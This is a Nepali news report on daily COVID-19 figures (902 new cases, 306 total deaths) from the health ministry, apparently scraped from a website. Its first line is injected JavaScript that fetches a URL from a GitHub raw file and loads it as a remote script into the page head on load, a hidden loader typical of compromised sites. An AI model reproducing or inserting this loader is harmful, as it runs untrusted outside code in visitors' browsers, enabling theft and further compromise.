;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ २३
काठमाडौं । पछिल्लो २४ घण्टामा ९०२ जनामा कोरोना भाइरसको संक्रमण पुष्टि भएको छ । स्वास्थ्य तथा जनसंख्या मन्त्रालयका प्रवक्ता डा. जागेश्गर गौतमका अनुसार पछिल्लो २४ घण्टामा ९०२ जना संक्रमित थपिएका छन् ।
योसहित हालसम्म कोरोना संक्रमित हुनेको संख्या ४८ हजार १ सय ३८ पुगेको छ । पछिल्लो २४ घण्टामा २२८७ जना कोरोना संक्रमणबाट निको भइ डिस्चार्ज भएका छन् । डिस्चार्ज हुनेको संख्या ३२ हजार ९६४ पुगेको छ । हाल सक्रिय संक्रमितको संख्या १४ हजार ८६८ रहेको छ ।
पछिल्लो २४ घण्टामा १० हजार ६११ जनाको पिसिआर परीक्षण भएको छ । त्यस्तै पछिल्लो २४ घण्टामा थप ६ जनाको कोरोनाबाट मृत्यु भएको भएको छ । हालसम्म कोरोनाबाट मृत्यु हुनेको संख्या ३०६ पुगेको छ ।
फेसबुक प्रतिक्रियाहरु